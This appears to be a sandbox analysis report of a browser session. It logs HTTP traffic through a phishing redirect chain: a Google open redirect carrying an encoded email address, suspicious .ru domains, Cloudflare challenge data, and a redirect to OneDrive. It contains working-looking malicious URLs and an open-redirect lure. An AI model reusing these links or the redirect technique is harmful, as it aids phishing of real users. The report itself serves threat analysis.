                                                            2024-12-14 09:11:05 UTC1347OUTData Raw: 6c 76 37 47 37 57 4c 39 4a 43 53 52 72 50 2d 4f 6c 6e 58 64 4a 66 7a 31 54 65 77 39 6f 4a 59 49 47 4f 50 54 58 77 57 65 47 42 44 4a 4a 47 52 57 42 56 4b 55 47 79 7a 30 7a 74 63 35 79 32 42 4d 34 2b 38 36 48 51 6f 5a 7a 6f 33 4c 56 76 61 64 55 33 34 42 39 4a 4d 72 69 65 65 48 56 46 35 44 57 4a 6b 4a 6a 57 42 31 4c 75 79 30 69 66 57 4a 6c 57 35 7a 64 66 33 32 5a 55 2b 62 6d 67 63 36 31 69 49 72 42 24 4a 4b 4f 6d 59 7a 6b 4f 78 47 42 4a 51 62 4a 56 50 42 76 69 7a 74 59 6f 6f 24 4a 73 4a 42 6b 42 4a 42 69 56 73 54 36 73 51 73 58 4c 31 46 46 69 34 4f 2d 4e 64 32 42 57 4a 77 4f 42 4a 4a 48 4a 5a 47 4c 79 31 78 4e 4d 73 4b 50 31 4d 4a 2d 37 69 24 50 77 79 6f 4f 56 69 54 72 4a 2d 37 53 67 31 6a 4a 73 72 79 56 56 24 4b 53 41 79 37 56 55 46 4a 6f 44 50 51 62 4a 57
                                                            Data Ascii: lv7G7WL9JCSRrP-OlnXdJfz1Tew9oJYIGOPTXwWeGBDJJGRWBVKUGyz0ztc5y2BM4+86HQoZzo3LVvadU34B9JMrieeHVF5DWJkJjWB1Luy0ifWJlW5zdf32ZU+bmgc61iIrB$JKOmYzkOxGBJQbJVPBviztYoo$JsJBkBJBiVsT6sQsXL1FFi4O-Nd2BWJwOBJJHJZGLy1xNMsKP1MJ-7i$PwyoOViTrJ-7Sg1jJsryVV$KSAy7VUFJoDPQbJW
                                                            2024-12-14 09:11:06 UTC286INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:11:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4576
                                                            Connection: close
                                                            cf-chl-out: PGg7N155EPFZbowVKjgYDuuLKjcdCi/F9Fxzz3g5slubDWDA8EPfzML7OXwvFGOLOu6AtD65WvUD0ZkhwBKQ0a+rQgnrXWekqRTpsvrrSfuB8gHlh9yx/YY=$M/2HV2numhz9plcl
                                                            2024-12-14 09:11:06 UTC1343INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 77 4f 4e 51 50 55 63 4d 4c 32 74 4e 78 43 78 77 36 34 79 54 69 42 4b 66 6a 33 62 6d 57 2f 6d 56 49 47 65 79 6e 69 75 38 78 62 53 42 44 46 30 4b 74 67 51 65 71 65 46 6b 47 6f 44 46 45 48 4f 78 6a 67 34 41 6b 6a 69 43 41 57 6d 64 55 73 46 69 4e 64 37 6f 37 52 48 4a 76 57 52 32 58 4c 74 79 47 36 4d 6d 77 69 63 55 61 30 78 46 4c 70 79 4a 75 62 5a 32 52 56 77 54 67 39 54 36 41 79 43 65 48 79 45 56 78 70 67 71 33 6b 6a 2b 69 37 48 55 71 53 6a 54 52 7a 74 62 68 41 73 41 56 4f 4a 33 4c 65 45 75 54 68 4b 43 7a 4b 2f 4b 53 4e 4c 30 6b 35 63 55 71 64 6f 68 70 57 65 44 49 51 43 62 71 68 48 59 62 31 7a 33 4f 56 75 71 2f 2f 75 74 65 75 66 6f 79 32 39 71 6c 53 67 56 53 62 58 35 50 4c 6f 46 35 45 4b 52 52 7a 4d 69 6e 4c 61 5a 38
                                                            Data Ascii: cf-chl-out-s: wONQPUcML2tNxCxw64yTiBKfj3bmW/mVIGeyniu8xbSBDF0KtgQeqeFkGoDFEHOxjg4AkjiCAWmdUsFiNd7o7RHJvWR2XLtyG6MmwicUa0xFLpyJubZ2RVwTg9T6AyCeHyEVxpgq3kj+i7HUqSjTRztbhAsAVOJ3LeEuThKCzK/KSNL0k5cUqdohpWeDIQCbqhHYb1z3OVuq//uteufoy29qlSgVSbX5PLoF5EKRRzMinLaZ8
                                                            2024-12-14 09:11:06 UTC1109INData Raw: 6d 33 61 67 69 71 32 79 65 35 53 50 6a 37 36 57 6d 61 6e 47 78 70 75 77 69 6f 79 62 69 62 33 4b 71 38 33 44 75 5a 6d 35 76 4c 4f 74 33 71 6a 4b 72 36 76 62 6f 38 58 54 78 64 36 70 78 4d 6a 4e 72 63 6a 4d 32 63 48 77 77 4f 53 2b 35 64 6d 7a 74 62 54 4c 32 39 50 78 76 37 66 5a 42 4e 76 45 42 77 66 55 77 51 66 59 41 4f 44 6e 41 67 54 67 37 77 51 51 34 77 37 4e 31 50 49 62 39 52 50 56 39 50 6f 62 32 4e 73 6c 2b 50 49 59 46 41 67 61 35 77 55 58 4a 53 4c 72 2b 2f 6f 49 4d 41 51 44 37 2b 6b 45 45 7a 73 38 4f 6a 45 63 4b 79 48 35 46 45 55 6d 4a 42 6c 49 43 44 38 66 4a 7a 63 48 48 51 30 51 45 54 51 64 46 45 73 6d 49 69 68 5a 4a 55 64 52 47 45 77 64 55 69 78 62 5a 47 55 2b 50 6d 41 6a 49 6d 56 6f 4a 57 51 2f 59 6a 35 7a 56 47 5a 44 55 6c 52 72 59 6b 64 30 63 31 74
                                                            Data Ascii: m3agiq2ye5SPj76WmanGxpuwioybib3Kq83DuZm5vLOt3qjKr6vbo8XTxd6pxMjNrcjM2cHwwOS+5dmztbTL29Pxv7fZBNvEBwfUwQfYAODnAgTg7wQQ4w7N1PIb9RPV9Pob2Nsl+PIYFAga5wUXJSLr+/oIMAQD7+kEEzs8OjEcKyH5FEUmJBlICD8fJzcHHQ0QETQdFEsmIihZJUdRGEwdUixbZGU+PmAjImVoJWQ/Yj5zVGZDUlRrYkd0c1t
                                                            2024-12-14 09:11:06 UTC1369INData Raw: 39 61 36 76 67 58 6a 34 66 62 51 32 39 59 4c 33 75 67 4f 43 73 33 76 32 77 49 41 34 2b 45 54 35 2b 6e 6c 44 76 7a 75 36 50 4d 63 39 65 33 66 2b 76 63 5a 38 77 6f 4a 38 79 6f 66 43 43 44 71 36 77 54 2b 46 42 38 45 37 76 63 6e 43 67 62 32 39 78 77 75 4c 6a 30 66 51 7a 34 36 46 78 51 41 46 79 55 2b 52 79 51 6b 47 77 74 46 4a 6b 55 4d 4a 53 38 31 49 44 6f 72 53 79 78 4a 50 43 6f 58 56 44 4a 6b 54 7a 78 41 4d 46 39 4a 51 55 56 41 56 30 4d 6e 57 6d 46 51 50 69 38 7a 54 43 39 6e 54 6b 31 49 62 6e 70 48 52 31 68 32 58 48 56 45 57 31 64 6a 52 30 52 6b 56 6c 53 46 58 6d 31 63 65 57 52 74 5a 49 42 78 64 4a 4a 36 64 6d 69 61 66 58 35 70 64 4a 4e 38 67 57 79 69 65 4a 61 65 70 6f 4f 66 64 4a 79 42 65 6e 68 78 67 59 39 73 6a 59 6d 6d 64 36 47 52 63 6f 57 6f 6e 59 75 75
                                                            Data Ascii: 9a6vgXj4fbQ29YL3ugOCs3v2wIA4+ET5+nlDvzu6PMc9e3f+vcZ8woJ8yofCCDq6wT+FB8E7vcnCgb29xwuLj0fQz46FxQAFyU+RyQkGwtFJkUMJS81IDorSyxJPCoXVDJkTzxAMF9JQUVAV0MnWmFQPi8zTC9nTk1IbnpHR1h2XHVEW1djR0RkVlSFXm1ceWRtZIBxdJJ6dmiafX5pdJN8gWyieJaepoOfdJyBenhxgY9sjYmmd6GRcoWonYuu
                                                            2024-12-14 09:11:06 UTC1369INData Raw: 33 37 42 62 79 39 43 77 50 39 35 75 77 54 42 51 55 56 41 67 58 6e 37 4e 55 59 43 2f 67 4e 36 4f 38 43 30 2b 4c 66 31 67 34 55 2f 53 4c 6e 39 43 51 69 36 67 59 70 47 78 73 76 4a 7a 51 6f 43 4f 6b 54 4a 79 55 75 4b 78 55 74 2b 54 5a 41 4e 78 55 45 42 41 55 31 42 43 76 38 52 45 5a 49 55 41 64 50 50 52 4d 30 4d 53 55 31 4b 68 51 53 46 6c 5a 4c 58 69 64 4d 4d 43 38 6a 54 54 67 31 4d 6b 59 6a 52 6c 34 35 53 6b 74 66 4d 45 42 50 55 46 46 41 55 46 4e 6a 61 7a 56 77 52 56 51 30 54 56 78 56 53 34 46 79 63 56 47 47 56 46 68 55 65 6b 4e 6a 5a 33 32 4f 58 46 79 42 66 6d 52 68 68 59 70 78 5a 59 35 63 65 58 52 64 6c 6f 35 5a 57 70 53 54 68 57 4e 77 6c 6d 52 71 67 57 5a 6f 6a 4b 69 73 71 4b 75 64 69 4c 4b 76 6a 36 69 77 65 48 6d 38 74 33 31 2b 6a 4c 75 36 6d 4a 53 36 6c
                                                            Data Ascii: 37Bby9CwP95uwTBQUVAgXn7NUYC/gN6O8C0+Lf1g4U/SLn9CQi6gYpGxsvJzQoCOkTJyUuKxUt+TZANxUEBAU1BCv8REZIUAdPPRM0MSU1KhQSFlZLXidMMC8jTTg1MkYjRl45SktfMEBPUFFAUFNjazVwRVQ0TVxVS4FycVGGVFhUekNjZ32OXFyBfmRhhYpxZY5ceXRdlo5ZWpSThWNwlmRqgWZojKisqKudiLKvj6iweHm8t31+jLu6mJS6l
                                                            2024-12-14 09:11:06 UTC729INData Raw: 4d 37 76 41 50 30 75 62 75 2f 75 73 55 46 68 44 61 2b 76 73 63 38 42 7a 61 32 75 44 63 4a 69 41 51 32 64 37 67 4a 4f 6b 4a 4b 41 49 48 45 54 41 6e 42 78 37 76 43 77 30 30 38 41 38 4a 4e 7a 38 70 39 53 33 37 41 68 4d 78 52 44 41 78 46 51 51 31 42 68 6b 34 4f 67 49 49 55 53 67 52 44 56 41 56 53 46 52 43 47 79 31 5a 52 7a 31 63 57 68 30 34 4e 6d 46 69 50 47 52 68 5a 57 4e 6c 57 47 56 45 63 43 64 63 51 58 56 56 4c 6d 42 44 52 58 63 35 4e 6b 64 36 50 44 6c 35 66 30 46 35 59 48 78 48 69 48 70 45 53 6c 36 4c 52 6b 46 62 62 55 78 38 68 35 46 52 67 59 31 6c 55 6e 43 4e 65 5a 36 4a 56 6e 4f 65 59 56 79 67 58 33 57 66 70 61 75 6b 69 61 78 6c 6a 57 71 53 62 59 5a 71 67 47 35 77 63 62 69 34 6b 49 6d 35 75 4b 71 65 75 62 32 56 77 48 36 41 77 6f 4b 6d 78 6f 76 4c 7a 4d
                                                            Data Ascii: M7vAP0ubu/usUFhDa+vsc8Bza2uDcJiAQ2d7gJOkJKAIHETAnBx7vCw008A8JNz8p9S37AhMxRDAxFQQ1Bhk4OgIIUSgRDVAVSFRCGy1ZRz1cWh04NmFiPGRhZWNlWGVEcCdcQXVVLmBDRXc5Nkd6PDl5f0F5YHxHiHpESl6LRkFbbUx8h5FRgY1lUnCNeZ6JVnOeYVygX3WfpaukiaxljWqSbYZqgG5wcbi4kIm5uKqeub2VwH6AwoKmxovLzM


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.449820104.18.95.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:11:07 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1218287069:1734164783:svNwVqlgGe--o7-M-DZ4hvYyFzq8ZgbcuaxVIprV47s/8f1d10088a7d4314/BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3V HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:11:07 UTC379INHTTP/1.1 404 Not Found
                                                            Date: Sat, 14 Dec 2024 09:11:07 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 7
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: ObYZtWJx9jpxNQfu75l2dTTR0fng0ScG53o=$xS+y17GiCvQR1Amv
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d109119307c9c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:11:07 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                            Data Ascii: invalid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.449827172.67.139.114436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:11:09 UTC664OUTGET /iiuxxyogslrdbqfxkhhhdftmfCAaOSYTIOIATZALRRJPJGMDGANITHJNUOOWODNCP HTTP/1.1
                                                            Host: 3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://galaxy.zofilane.ru
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://galaxy.zofilane.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:11:09 UTC900INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:11:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aY4F%2BwVM5sHn8tqwZJWUD9a0HeWqlChHYMbFWU8iZyBEm74UZ7QeZbLK%2BEwKmY22VWf3MmV4wBtRWT8jMFbYTJ5e9CmF3dU08mlgISDP%2FZMff9ahw7PCvXFij4cGzOThj2oe3Pa98UAHCAAjT%2BhF7awqwA%2FaheCrOseG4M3SAvyJ3%2FzVN9iWJJ%2FCIWwU4x%2FyH73cDg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d109bbadd425b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1622&rtt_var=632&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1242&delivery_rate=1697674&cwnd=238&unsent_bytes=0&cid=e368a16a95b0af07&ts=879&x=0"
                                                            2024-12-14 09:11:09 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                            Data Ascii: 11
                                                            2024-12-14 09:11:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.449839104.21.32.2514436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:11:12 UTC454OUTGET /iiuxxyogslrdbqfxkhhhdftmfCAaOSYTIOIATZALRRJPJGMDGANITHJNUOOWODNCP HTTP/1.1
                                                            Host: 3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:11:13 UTC896INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:11:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ocWr4TMbKguL0bPd2MJ8mu8cCugrHTydhRkLfDSZJVDcko9vy%2FiUfhlW5GKTcSAtrdQfaxnQnf5JKP69Ehl4W5Fq6Gf01MbU69PgqNLVhBbYmvH4tB46l88iSkwPjVElrS%2BEBmMaY6JIhVQI1Fp1%2FqTkuwPm79xu%2F6%2Bn%2Bpq8ktKCKweqVckyJZxFL6GtHRcHo5nxnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d10b16a9d236a-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=2033&rtt_var=772&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1032&delivery_rate=1407907&cwnd=170&unsent_bytes=0&cid=6aa1e55f73939c78&ts=887&x=0"
                                                            2024-12-14 09:11:13 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                            Data Ascii: 11
                                                            2024-12-14 09:11:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.44984213.107.137.114436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:11:14 UTC684OUTGET / HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: keep-alive
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-Dest: document
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Referer: https://galaxy.zofilane.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:11:15 UTC2223INHTTP/1.1 302 Found
                                                            Cache-Control: private
                                                            Content-Length: 186
                                                            Content-Type: text/html; charset=utf-8
                                                            Location: https://www.microsoft.com/microsoft-365/onedrive/online-cloud-storage
                                                            P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                            X-NetworkStatistics: 0,525568,0,0,48691,0,154438,4
                                                            X-SharePointHealthScore: 2
                                                            Content-Security-Policy: frame-ancestors 'self' sentry.contentvalidation.com sentry.ppe.contentvalidation.com sentry.int.contentvalidation.com
                                                            X-AspNet-Version: 4.0.30319
                                                            X-DataBoundary: NONE
                                                            X-1DSCollectorUrl: https://mobile.events.data.microsoft.com/OneCollector/1.0/
                                                            X-AriaCollectorURL: https://browser.pipe.aria.microsoft.com/Collector/3.0/
                                                            SPRequestGuid: c8696da1-90aa-7000-5147-19f3d371eb49
                                                            request-id: c8696da1-90aa-7000-5147-19f3d371eb49
                                                            MS-CV: oW1pyKqQAHBRRxnz03HrSQ.0
                                                            Alt-Svc: h3=":443";ma=86400
                                                            Report-To: {"group":"network-errors","max_age":7200,"endpoints":[{"url":"https://spo.nel.measure.office.net/api/report?tenantId=00000000-0000-0000-0000-000000000000&destinationEndpoint=Edge-Prod-BN3r1&frontEnd=AFD&RemoteIP=8.46.123.0"}]}
                                                            NEL: {"report_to":"network-errors","max_age":7200,"success_fraction":0.001,"failure_fraction":1.0}
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-FRAME-OPTIONS: SAMEORIGIN
                                                            Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com teams.cloud.microsoft *.office365.com goals.cloud.microsoft *.powerapps.com app.powerbi.com *.yammer.com engage.cloud.microsoft word.cloud.microsoft excel.cloud.microsoft powerpoint.cloud.microsoft *.officeapps.live.com *.office.com *.microsoft365.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com onedrive.live.com *.onedrive.live.com securebroker.sharepointonline.com;
                                                            SPRequestDuration: 9
                                                            SPIisLatency: 2
                                                            X-Powered-By: ASP.NET
                                                            MicrosoftSharePointTeamServices: 16.0.0.25506
                                                            X-Content-Type-Options: nosniff
                                                            X-MS-InvokeApp: 1; RequireReadOnly
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 4302D1F738694BC2965E97F0712E98A3 Ref B: BN3EDGE0621 Ref C: 2024-12-14T09:11:14Z
                                                            Date: Sat, 14 Dec 2024 09:11:14 GMT
                                                            Connection: close
                                                            2024-12-14 09:11:15 UTC186INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 6d 69 63 72 6f 73 6f 66 74 2d 33 36 35 2f 6f 6e 65 64 72 69 76 65 2f 6f 6e 6c 69 6e 65 2d 63 6c 6f 75 64 2d 73 74 6f 72 61 67 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.microsoft.com/microsoft-365/onedrive/online-cloud-storage">here</a>.</h2></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.44984835.190.80.14436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:11:16 UTC537OUTOPTIONS /report/v4?s=b7cY8HkXFqu1hKoGQa3oJNOzYiP%2FmcIAR60wGyytO8OE6E3W1SV9Z7c2NxfJYv8SN%2B7k5IU7OA9PovUg45W3ZuhFTwsMjZ5%2BrhcQtoldX5aHz0VJsIKD8UFCVDem9Q%3D%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Origin: https://galaxy.zofilane.ru
                                                            Access-Control-Request-Method: POST
                                                            Access-Control-Request-Headers: content-type
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:11:16 UTC336INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            access-control-max-age: 86400
                                                            access-control-allow-methods: POST, OPTIONS
                                                            access-control-allow-origin: *
                                                            access-control-allow-headers: content-type, content-length
                                                            date: Sat, 14 Dec 2024 09:11:16 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            36192.168.2.44985535.190.80.14436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:11:17 UTC476OUTPOST /report/v4?s=b7cY8HkXFqu1hKoGQa3oJNOzYiP%2FmcIAR60wGyytO8OE6E3W1SV9Z7c2NxfJYv8SN%2B7k5IU7OA9PovUg45W3ZuhFTwsMjZ5%2BrhcQtoldX5aHz0VJsIKD8UFCVDem9Q%3D%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 438
                                                            Content-Type: application/reports+json
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:11:17 UTC438OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 33 30 39 37 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 34 35 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 67 61 6c 61 78 79 2e 7a 6f 66 69 6c 61 6e 65 2e 72 75 2f 70 44 30 4a 4d 32 73 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 36 37 2e 34 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b
                                                            Data Ascii: [{"age":53097,"body":{"elapsed_time":3452,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://galaxy.zofilane.ru/pD0JM2s/","sampling_fraction":1.0,"server_ip":"104.21.67.40","status_code":404,"type":"http.error"},"type":"network
                                                            2024-12-14 09:11:18 UTC168INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            date: Sat, 14 Dec 2024 09:11:17 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:04:09:54
                                                            Start date:14/12/2024
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                            Imagebase:0x7ff76e190000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:2
                                                            Start time:04:09:56
                                                            Start date:14/12/2024
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2356,i,11036611443396559380,4828039607253252952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                            Imagebase:0x7ff76e190000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:3
                                                            Start time:04:10:03
                                                            Start date:14/12/2024
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ=="
                                                            Imagebase:0x7ff76e190000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            No disassembly